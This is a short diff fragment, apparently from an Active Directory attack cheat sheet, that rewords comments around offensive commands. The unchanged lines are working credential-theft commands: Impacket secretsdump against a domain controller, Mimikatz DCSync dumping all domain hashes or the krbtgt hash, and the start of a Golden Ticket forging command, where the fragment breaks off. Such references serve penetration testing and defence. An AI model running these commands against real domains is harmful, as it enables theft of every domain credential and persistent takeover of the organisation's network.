 python3 secretsdump.py domain.local/admin:password@10.10.10.1

-# Via Mimikatz (on Windows)
+# Via Mimikatz on a Windows foothold

 lsadump::dcsync /domain:domain.local /all /csv

-lsadump::dcsync /domain:domain.local /user:krbtgt # just krbtgt hash
+lsadump::dcsync /domain:domain.local /user:krbtgt # just the krbtgt hash

 Golden Ticket

-# Get krbtgt hash via DCSync first
+# Get krbtgt hash first via DCSync

 kerberos::golden /user:administrator /domain:domain.local \